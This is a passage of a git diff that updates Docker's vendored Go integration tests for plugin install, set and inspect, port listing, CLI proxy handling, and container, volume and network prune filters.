+	env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", name)
 	c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]")
+
+	env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}", name)
+	c.Assert(strings.TrimSpace(env), checker.Contains, mntSrc)
+
+	dockerCmd(c, "plugin", "set", name, "pmount1.source=bar")
+
+	env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}", name)
+	c.Assert(strings.TrimSpace(env), checker.Contains, "bar")
+
+	out, _, err := dockerCmdWithError("plugin", "set", name, "pmount2.source=bar2")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "Plugin config has no mount source")
+
+	out, _, err = dockerCmdWithError("plugin", "set", name, "pdev2.path=/dev/bar2")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "Plugin config has no device path")
+
 }
 
-func (s *DockerSuite) TestPluginInstallArgs(c *check.C) {
-	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+func (ps *DockerPluginSuite) TestPluginInstallArgs(c *check.C) {
+	pName := path.Join(ps.registryHost(), "plugin", "testplugininstallwithargs")
+	ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+	defer cancel()
+
+	plugin.CreateInRegistry(ctx, pName, nil, func(cfg *plugin.Config) {
+		cfg.Env = []types.PluginEnv{{Name: "DEBUG", Settable: []string{"value"}}}
+	})
+
 	out, _ := dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--disable", pName, "DEBUG=1")
 	c.Assert(strings.TrimSpace(out), checker.Contains, pName)
 
@@ -171,8 +223,8 @@ func (s *DockerSuite) TestPluginInstallArgs(c *check.C) {
 	c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]")
 }
 
-func (s *DockerRegistrySuite) TestPluginInstallImage(c *check.C) {
-	testRequires(c, DaemonIsLinux, IsAmd64)
+func (ps *DockerPluginSuite) TestPluginInstallImage(c *check.C) {
+	testRequires(c, IsAmd64)
 
 	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
 	// tag the image to upload it to the private registry
@@ -182,11 +234,12 @@ func (s *DockerRegistrySuite) TestPluginInstallImage(c *check.C) {
 
 	out, _, err := dockerCmdWithError("plugin", "install", repoName)
 	c.Assert(err, checker.NotNil)
-	c.Assert(out, checker.Contains, "target is image")
+	c.Assert(out, checker.Contains, `Encountered remote "application/vnd.docker.container.image.v1+json"(image) when fetching`)
 }
 
-func (s *DockerSuite) TestPluginEnableDisableNegative(c *check.C) {
-	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+func (ps *DockerPluginSuite) TestPluginEnableDisableNegative(c *check.C) {
+	pName := ps.getPluginRepoWithTag()
+
 	out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pName)
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Contains, pName)
@@ -206,9 +259,7 @@ func (s *DockerSuite) TestPluginEnableDisableNegative(c *check.C) {
 	c.Assert(err, checker.IsNil)
 }
 
-func (s *DockerSuite) TestPluginCreate(c *check.C) {
-	testRequires(c, DaemonIsLinux, IsAmd64, Network)
-
+func (ps *DockerPluginSuite) TestPluginCreate(c *check.C) {
 	name := "foo/bar-driver"
 	temp, err := ioutil.TempDir("", "foo")
 	c.Assert(err, checker.IsNil)
@@ -240,15 +291,15 @@ func (s *DockerSuite) TestPluginCreate(c *check.C) {
 	c.Assert(len(strings.Split(strings.TrimSpace(out), "\n")), checker.Equals, 2)
 }
 
-func (s *DockerSuite) TestPluginInspect(c *check.C) {
-	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+func (ps *DockerPluginSuite) TestPluginInspect(c *check.C) {
+	pNameWithTag := ps.getPluginRepoWithTag()
+
 	_, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag)
 	c.Assert(err, checker.IsNil)
 
 	out, _, err := dockerCmdWithError("plugin", "ls")
 	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, pName)
-	c.Assert(out, checker.Contains, pTag)
+	c.Assert(out, checker.Contains, pNameWithTag)
 	c.Assert(out, checker.Contains, "true")
 
 	// Find the ID first
@@ -273,7 +324,7 @@ func (s *DockerSuite) TestPluginInspect(c *check.C) {
 	c.Assert(strings.TrimSpace(out), checker.Equals, id)
 
 	// Name without tag form
-	out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pName)
+	out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", ps.getPluginRepo())
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Equals, id)
 
@@ -300,68 +351,96 @@ func (s *DockerSuite) TestPluginInspectOnWindows(c *check.C) {
 	c.Assert(err.Error(), checker.Contains, "plugins are not supported on this platform")
 }
 
-func (s *DockerTrustSuite) TestPluginTrustedInstall(c *check.C) {
-	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+func (ps *DockerPluginSuite) TestPluginIDPrefix(c *check.C) {
+	name := "test"
+	client := testEnv.APIClient()
+
+	ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+	initialValue := "0"
+	err := plugin.Create(ctx, client, name, func(cfg *plugin.Config) {
+		cfg.Env = []types.PluginEnv{{Name: "DEBUG", Value: &initialValue, Settable: []string{"value"}}}
+	})
+	cancel()
 
-	trustedName := s.setupTrustedplugin(c, pNameWithTag, "trusted-plugin-install")
+	c.Assert(err, checker.IsNil, check.Commentf("failed to create test plugin"))
 
-	installCmd := exec.Command(dockerBinary, "plugin", "install", "--grant-all-permissions", trustedName)
-	s.trustedCmd(installCmd)
-	out, _, err := runCommandWithOutput(installCmd)
+	// Find ID first
+	id, _, err := dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", name)
+	id = strings.TrimSpace(id)
+	c.Assert(err, checker.IsNil)
 
-	c.Assert(strings.TrimSpace(out), checker.Contains, trustedName)
+	// List current state
+	out, _, err := dockerCmdWithError("plugin", "ls")
 	c.Assert(err, checker.IsNil)
-	c.Assert(strings.TrimSpace(out), checker.Contains, trustedName)
+	c.Assert(out, checker.Contains, name)
+	c.Assert(out, checker.Contains, "false")
+
+	env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", id[:5])
+	c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=0]")
 
+	dockerCmd(c, "plugin", "set", id[:5], "DEBUG=1")
+
+	env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", id[:5])
+	c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]")
+
+	// Enable
+	_, _, err = dockerCmdWithError("plugin", "enable", id[:5])
+	c.Assert(err, checker.IsNil)
 	out, _, err = dockerCmdWithError("plugin", "ls")
 	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name)
 	c.Assert(out, checker.Contains, "true")
 
-	out, _, err = dockerCmdWithError("plugin", "disable", trustedName)
+	// Disable
+	_, _, err = dockerCmdWithError("plugin", "disable", id[:5])
 	c.Assert(err, checker.IsNil)
-	c.Assert(strings.TrimSpace(out), checker.Contains, trustedName)
-
-	out, _, err = dockerCmdWithError("plugin", "enable", trustedName)
+	out, _, err = dockerCmdWithError("plugin", "ls")
 	c.Assert(err, checker.IsNil)
-	c.Assert(strings.TrimSpace(out), checker.Contains, trustedName)
+	c.Assert(out, checker.Contains, name)
+	c.Assert(out, checker.Contains, "false")
 
-	out, _, err = dockerCmdWithError("plugin", "rm", "-f", trustedName)
+	// Remove
+	out, _, err = dockerCmdWithError("plugin", "remove", id[:5])
 	c.Assert(err, checker.IsNil)
-	c.Assert(strings.TrimSpace(out), checker.Contains, trustedName)
-
-	// Try untrusted pull to ensure we pushed the tag to the registry
-	installCmd = exec.Command(dockerBinary, "plugin", "install", "--disable-content-trust=true", "--grant-all-permissions", trustedName)
-	s.trustedCmd(installCmd)
-	out, _, err = runCommandWithOutput(installCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out))
-
+	// List returns none
 	out, _, err = dockerCmdWithError("plugin", "ls")
 	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, "true")
-
+	c.Assert(out, checker.Not(checker.Contains), name)
 }
 
-func (s *DockerTrustSuite) TestPluginUntrustedInstall(c *check.C) {
-	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+func (ps *DockerPluginSuite) TestPluginListDefaultFormat(c *check.C) {
+	config, err := ioutil.TempDir("", "config-file-")
+	c.Assert(err, check.IsNil)
+	defer os.RemoveAll(config)
 
-	pluginName := fmt.Sprintf("%v/dockercliuntrusted/plugintest:latest", privateRegistryURL)
-	// install locally and push to private registry
-	dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--alias", pluginName, pNameWithTag)
-	dockerCmd(c, "plugin", "push", pluginName)
-	dockerCmd(c, "plugin", "rm", "-f", pluginName)
+	err = ioutil.WriteFile(filepath.Join(config, "config.json"), []byte(`{"pluginsFormat": "raw"}`), 0644)
+	c.Assert(err, check.IsNil)
+
+	name := "test:latest"
+	client := testEnv.APIClient()
+
+	ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+	defer cancel()
+	err = plugin.Create(ctx, client, name, func(cfg *plugin.Config) {
+		cfg.Description = "test plugin"
+	})
+	c.Assert(err, checker.IsNil, check.Commentf("failed to create test plugin"))
+
+	out, _ := dockerCmd(c, "plugin", "inspect", "--format", "{{.ID}}", name)
+	id := strings.TrimSpace(out)
 
-	// Try trusted install on untrusted plugin
-	installCmd := exec.Command(dockerBinary, "plugin", "install", "--grant-all-permissions", pluginName)
-	s.trustedCmd(installCmd)
-	out, _, err := runCommandWithOutput(installCmd)
+	// We expect the format to be in `raw + --no-trunc`
+	expectedOutput := fmt.Sprintf(`plugin_id: %s
+name: %s
+description: test plugin
+enabled: false`, id, name)
 
-	c.Assert(err, check.NotNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out))
+	out, _ = dockerCmd(c, "--config", config, "plugin", "ls", "--no-trunc")
+	c.Assert(strings.TrimSpace(out), checker.Contains, expectedOutput)
 }
 
 func (s *DockerSuite) TestPluginUpgrade(c *check.C) {
-	testRequires(c, DaemonIsLinux, Network, SameHostDaemon, IsAmd64)
+	testRequires(c, DaemonIsLinux, Network, SameHostDaemon, IsAmd64, NotUserNamespace)
 	plugin := "cpuguy83/docker-volume-driver-plugin-local:latest"
 	pluginV2 := "cpuguy83/docker-volume-driver-plugin-local:v2"
 
@@ -377,17 +456,38 @@ func (s *DockerSuite) TestPluginUpgrade(c *check.C) {
 	id := strings.TrimSpace(out)
 
 	// make sure "v2" does not exists
-	_, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id, "rootfs", "v2"))
+	_, err = os.Stat(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "plugins", id, "rootfs", "v2"))
 	c.Assert(os.IsNotExist(err), checker.True, check.Commentf(out))
 
 	dockerCmd(c, "plugin", "disable", "-f", plugin)
 	dockerCmd(c, "plugin", "upgrade", "--grant-all-permissions", "--skip-remote-check", plugin, pluginV2)
 
 	// make sure "v2" file exists
-	_, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id, "rootfs", "v2"))
+	_, err = os.Stat(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "plugins", id, "rootfs", "v2"))
 	c.Assert(err, checker.IsNil)
 
 	dockerCmd(c, "plugin", "enable", plugin)
 	dockerCmd(c, "volume", "inspect", "bananas")
 	dockerCmd(c, "run", "--rm", "-v", "bananas:/apple", "busybox", "sh", "-c", "ls -lh /apple/core")
 }
+
+func (s *DockerSuite) TestPluginMetricsCollector(c *check.C) {
+	testRequires(c, DaemonIsLinux, Network, SameHostDaemon, IsAmd64)
+	d := daemon.New(c, dockerBinary, dockerdBinary)
+	d.Start(c)
+	defer d.Stop(c)
+
+	name := "cpuguy83/docker-metrics-plugin-test:latest"
+	r := cli.Docker(cli.Args("plugin", "install", "--grant-all-permissions", name), cli.Daemon(d))
+	c.Assert(r.Error, checker.IsNil, check.Commentf(r.Combined()))
+
+	// plugin lisens on localhost:19393 and proxies the metrics
+	resp, err := http.Get("http://localhost:19393/metrics")
+	c.Assert(err, checker.IsNil)
+	defer resp.Body.Close()
+
+	b, err := ioutil.ReadAll(resp.Body)
+	c.Assert(err, checker.IsNil)
+	// check that a known metric is there... don't expect this metric to change over time.. probably safe
+	c.Assert(string(b), checker.Contains, "container_actions")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go
index 80b00fe93e..84058cda10 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go
@@ -5,9 +5,10 @@ import (
 	"net"
 	"regexp"
 	"sort"
+	"strconv"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 )
 
@@ -148,9 +149,8 @@ func (s *DockerSuite) TestPortList(c *check.C) {
 
 	out, _ = dockerCmd(c, "port", ID)
 
-	err = assertPortList(c, out, []string{
-		"80/tcp -> 0.0.0.0:8000",
-		"80/udp -> 0.0.0.0:8000"})
+	// Running this test multiple times causes the TCP port to increment.
+	err = assertPortRange(c, out, []int{8000, 8080}, []int{8000, 8080})
 	// Port list is not correct
 	c.Assert(err, checker.IsNil)
 	dockerCmd(c, "rm", "-f", ID)
@@ -173,6 +173,38 @@ func assertPortList(c *check.C, out string, expected []string) error {
 	return nil
 }
 
+func assertPortRange(c *check.C, out string, expectedTcp, expectedUdp []int) error {
+	lines := strings.Split(strings.Trim(out, "\n "), "\n")
+
+	var validTcp, validUdp bool
+	for _, l := range lines {
+		// 80/tcp -> 0.0.0.0:8015
+		port, err := strconv.Atoi(strings.Split(l, ":")[1])
+		if err != nil {
+			return err
+		}
+		if strings.Contains(l, "tcp") && expectedTcp != nil {
+			if port < expectedTcp[0] || port > expectedTcp[1] {
+				return fmt.Errorf("tcp port (%d) not in range expected range %d-%d", port, expectedTcp[0], expectedTcp[1])
+			}
+			validTcp = true
+		}
+		if strings.Contains(l, "udp") && expectedUdp != nil {
+			if port < expectedUdp[0] || port > expectedUdp[1] {
+				return fmt.Errorf("udp port (%d) not in range expected range %d-%d", port, expectedUdp[0], expectedUdp[1])
+			}
+			validUdp = true
+		}
+	}
+	if !validTcp {
+		return fmt.Errorf("tcp port not found")
+	}
+	if !validUdp {
+		return fmt.Errorf("udp port not found")
+	}
+	return nil
+}
+
 func stopRemoveContainer(id string, c *check.C) {
 	dockerCmd(c, "rm", "-f", id)
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go
index 1cf569b806..52159aa9c5 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go
@@ -2,23 +2,20 @@ package main
 
 import (
 	"net"
-	"os/exec"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 func (s *DockerSuite) TestCLIProxyDisableProxyUnixSock(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	testRequires(c, SameHostDaemon) // test is valid when DOCKER_HOST=unix://..
-
-	cmd := exec.Command(dockerBinary, "info")
-	cmd.Env = appendBaseEnv(false, "HTTP_PROXY=http://127.0.0.1:9999")
-
-	out, _, err := runCommandWithOutput(cmd)
-	c.Assert(err, checker.IsNil, check.Commentf("%v", out))
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
 
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "info"},
+		Env:     appendBaseEnv(false, "HTTP_PROXY=http://127.0.0.1:9999"),
+	}).Assert(c, icmd.Success)
 }
 
 // Can't use localhost here since go has a special case to not use proxy if connecting to localhost
@@ -40,14 +37,15 @@ func (s *DockerDaemonSuite) TestCLIProxyProxyTCPSock(c *check.C) {
 
 	c.Assert(ip, checker.Not(checker.Equals), "")
 
-	err = s.d.Start("-H", "tcp://"+ip+":2375")
-	c.Assert(err, checker.IsNil)
-	cmd := exec.Command(dockerBinary, "info")
-	cmd.Env = []string{"DOCKER_HOST=tcp://" + ip + ":2375", "HTTP_PROXY=127.0.0.1:9999"}
-	out, _, err := runCommandWithOutput(cmd)
-	c.Assert(err, checker.NotNil, check.Commentf("%v", out))
+	s.d.Start(c, "-H", "tcp://"+ip+":2375")
+
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "info"},
+		Env:     []string{"DOCKER_HOST=tcp://" + ip + ":2375", "HTTP_PROXY=127.0.0.1:9999"},
+	}).Assert(c, icmd.Expected{Error: "exit status 1", ExitCode: 1})
 	// Test with no_proxy
-	cmd.Env = append(cmd.Env, "NO_PROXY="+ip)
-	out, _, err = runCommandWithOutput(exec.Command(dockerBinary, "info"))
-	c.Assert(err, checker.IsNil, check.Commentf("%v", out))
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "info"},
+		Env:     []string{"DOCKER_HOST=tcp://" + ip + ":2375", "HTTP_PROXY=127.0.0.1:9999", "NO_PROXY=" + ip},
+	}).Assert(c, icmd.Success)
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go
index dabbc72081..d60420b591 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go
@@ -3,23 +3,39 @@
 package main
 
 import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
 	"strconv"
 	"strings"
+	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
+	"github.com/docker/docker/integration-cli/daemon"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
-func pruneNetworkAndVerify(c *check.C, d *SwarmDaemon, kept, pruned []string) {
+func pruneNetworkAndVerify(c *check.C, d *daemon.Daemon, kept, pruned []string) {
 	_, err := d.Cmd("network", "prune", "--force")
 	c.Assert(err, checker.IsNil)
-	out, err := d.Cmd("network", "ls", "--format", "{{.Name}}")
-	c.Assert(err, checker.IsNil)
+
 	for _, s := range kept {
-		c.Assert(out, checker.Contains, s)
+		waitAndAssert(c, defaultReconciliationTimeout, func(*check.C) (interface{}, check.CommentInterface) {
+			out, err := d.Cmd("network", "ls", "--format", "{{.Name}}")
+			c.Assert(err, checker.IsNil)
+			return out, nil
+		}, checker.Contains, s)
 	}
+
 	for _, s := range pruned {
-		c.Assert(out, checker.Not(checker.Contains), s)
+		waitAndAssert(c, defaultReconciliationTimeout, func(*check.C) (interface{}, check.CommentInterface) {
+			out, err := d.Cmd("network", "ls", "--format", "{{.Name}}")
+			c.Assert(err, checker.IsNil)
+			return out, nil
+		}, checker.Not(checker.Contains), s)
 	}
 }
 
@@ -40,13 +56,14 @@ func (s *DockerSwarmSuite) TestPruneNetwork(c *check.C) {
 
 	serviceName := "testprunesvc"
 	replicas := 1
-	out, err := d.Cmd("service", "create", "--name", serviceName,
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image",
+		"--name", serviceName,
 		"--replicas", strconv.Itoa(replicas),
 		"--network", "n3",
 		"busybox", "top")
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, replicas+1)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, replicas+1)
 
 	// prune and verify
 	pruneNetworkAndVerify(c, d, []string{"n1", "n3"}, []string{"n2", "n4"})
@@ -56,20 +73,23 @@ func (s *DockerSwarmSuite) TestPruneNetwork(c *check.C) {
 	c.Assert(err, checker.IsNil)
 	_, err = d.Cmd("service", "rm", serviceName)
 	c.Assert(err, checker.IsNil)
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 0)
+
 	pruneNetworkAndVerify(c, d, []string{}, []string{"n1", "n3"})
 }
 
 func (s *DockerDaemonSuite) TestPruneImageDangling(c *check.C) {
-	c.Assert(s.d.StartWithBusybox(), checker.IsNil)
+	s.d.StartWithBusybox(c)
 
-	out, _, err := s.d.buildImageWithOut("test",
-		`FROM busybox
-                 LABEL foo=bar`, true, "-q")
-	c.Assert(err, checker.IsNil)
-	id := strings.TrimSpace(out)
+	result := cli.BuildCmd(c, "test", cli.Daemon(s.d),
+		build.WithDockerfile(`FROM busybox
+                 LABEL foo=bar`),
+		cli.WithFlags("-q"),
+	)
+	result.Assert(c, icmd.Success)
+	id := strings.TrimSpace(result.Combined())
 
-	out, err = s.d.Cmd("images", "-q", "--no-trunc")
+	out, err := s.d.Cmd("images", "-q", "--no-trunc")
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Contains, id)
 
@@ -89,3 +109,201 @@ func (s *DockerDaemonSuite) TestPruneImageDangling(c *check.C) {
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id)
 }
+
+func (s *DockerSuite) TestPruneContainerUntil(c *check.C) {
+	out := cli.DockerCmd(c, "run", "-d", "busybox").Combined()
+	id1 := strings.TrimSpace(out)
+	cli.WaitExited(c, id1, 5*time.Second)
+
+	until := daemonUnixTime(c)
+
+	out = cli.DockerCmd(c, "run", "-d", "busybox").Combined()
+	id2 := strings.TrimSpace(out)
+	cli.WaitExited(c, id2, 5*time.Second)
+
+	out = cli.DockerCmd(c, "container", "prune", "--force", "--filter", "until="+until).Combined()
+	c.Assert(strings.TrimSpace(out), checker.Contains, id1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2)
+
+	out = cli.DockerCmd(c, "ps", "-a", "-q", "--no-trunc").Combined()
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id2)
+}
+
+func (s *DockerSuite) TestPruneContainerLabel(c *check.C) {
+	out := cli.DockerCmd(c, "run", "-d", "--label", "foo", "busybox").Combined()
+	id1 := strings.TrimSpace(out)
+	cli.WaitExited(c, id1, 5*time.Second)
+
+	out = cli.DockerCmd(c, "run", "-d", "--label", "bar", "busybox").Combined()
+	id2 := strings.TrimSpace(out)
+	cli.WaitExited(c, id2, 5*time.Second)
+
+	out = cli.DockerCmd(c, "run", "-d", "busybox").Combined()
+	id3 := strings.TrimSpace(out)
+	cli.WaitExited(c, id3, 5*time.Second)
+
+	out = cli.DockerCmd(c, "run", "-d", "--label", "foobar", "busybox").Combined()
+	id4 := strings.TrimSpace(out)
+	cli.WaitExited(c, id4, 5*time.Second)
+
+	// Add a config file of label=foobar, that will have no impact if cli is label!=foobar
+	config := `{"pruneFilters": ["label=foobar"]}`
+	d, err := ioutil.TempDir("", "integration-cli-")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(d)
+	err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644)
+	c.Assert(err, checker.IsNil)
+
+	// With config.json only, prune based on label=foobar
+	out = cli.DockerCmd(c, "--config", d, "container", "prune", "--force").Combined()
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id4)
+
+	out = cli.DockerCmd(c, "container", "prune", "--force", "--filter", "label=foo").Combined()
+	c.Assert(strings.TrimSpace(out), checker.Contains, id1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3)
+
+	out = cli.DockerCmd(c, "ps", "-a", "-q", "--no-trunc").Combined()
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id2)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id3)
+
+	out = cli.DockerCmd(c, "container", "prune", "--force", "--filter", "label!=bar").Combined()
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id3)
+
+	out = cli.DockerCmd(c, "ps", "-a", "-q", "--no-trunc").Combined()
+	c.Assert(strings.TrimSpace(out), checker.Contains, id2)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3)
+
+	// With config.json label=foobar and CLI label!=foobar, CLI label!=foobar supersede
+	out = cli.DockerCmd(c, "--config", d, "container", "prune", "--force", "--filter", "label!=foobar").Combined()
+	c.Assert(strings.TrimSpace(out), checker.Contains, id2)
+
+	out = cli.DockerCmd(c, "ps", "-a", "-q", "--no-trunc").Combined()
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2)
+}
+
+func (s *DockerSuite) TestPruneVolumeLabel(c *check.C) {
+	out, _ := dockerCmd(c, "volume", "create", "--label", "foo")
+	id1 := strings.TrimSpace(out)
+	c.Assert(id1, checker.Not(checker.Equals), "")
+
+	out, _ = dockerCmd(c, "volume", "create", "--label", "bar")
+	id2 := strings.TrimSpace(out)
+	c.Assert(id2, checker.Not(checker.Equals), "")
+
+	out, _ = dockerCmd(c, "volume", "create")
+	id3 := strings.TrimSpace(out)
+	c.Assert(id3, checker.Not(checker.Equals), "")
+
+	out, _ = dockerCmd(c, "volume", "create", "--label", "foobar")
+	id4 := strings.TrimSpace(out)
+	c.Assert(id4, checker.Not(checker.Equals), "")
+
+	// Add a config file of label=foobar, that will have no impact if cli is label!=foobar
+	config := `{"pruneFilters": ["label=foobar"]}`
+	d, err := ioutil.TempDir("", "integration-cli-")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(d)
+	err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644)
+	c.Assert(err, checker.IsNil)
+
+	// With config.json only, prune based on label=foobar
+	out, _ = dockerCmd(c, "--config", d, "volume", "prune", "--force")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id4)
+
+	out, _ = dockerCmd(c, "volume", "prune", "--force", "--filter", "label=foo")
+	c.Assert(strings.TrimSpace(out), checker.Contains, id1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3)
+
+	out, _ = dockerCmd(c, "volume", "ls", "--format", "{{.Name}}")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id2)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id3)
+
+	out, _ = dockerCmd(c, "volume", "prune", "--force", "--filter", "label!=bar")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id3)
+
+	out, _ = dockerCmd(c, "volume", "ls", "--format", "{{.Name}}")
+	c.Assert(strings.TrimSpace(out), checker.Contains, id2)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3)
+
+	// With config.json label=foobar and CLI label!=foobar, CLI label!=foobar supersede
+	out, _ = dockerCmd(c, "--config", d, "volume", "prune", "--force", "--filter", "label!=foobar")
+	c.Assert(strings.TrimSpace(out), checker.Contains, id2)
+
+	out, _ = dockerCmd(c, "volume", "ls", "--format", "{{.Name}}")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2)
+}
+
+func (s *DockerSuite) TestPruneNetworkLabel(c *check.C) {
+	dockerCmd(c, "network", "create", "--label", "foo", "n1")
+	dockerCmd(c, "network", "create", "--label", "bar", "n2")
+	dockerCmd(c, "network", "create", "n3")
+
+	out, _ := dockerCmd(c, "network", "prune", "--force", "--filter", "label=foo")
+	c.Assert(strings.TrimSpace(out), checker.Contains, "n1")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n2")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n3")
+
+	out, _ = dockerCmd(c, "network", "prune", "--force", "--filter", "label!=bar")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n1")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n2")
+	c.Assert(strings.TrimSpace(out), checker.Contains, "n3")
+
+	out, _ = dockerCmd(c, "network", "prune", "--force")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n1")
+	c.Assert(strings.TrimSpace(out), checker.Contains, "n2")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n3")
+}
+
+func (s *DockerDaemonSuite) TestPruneImageLabel(c *check.C) {
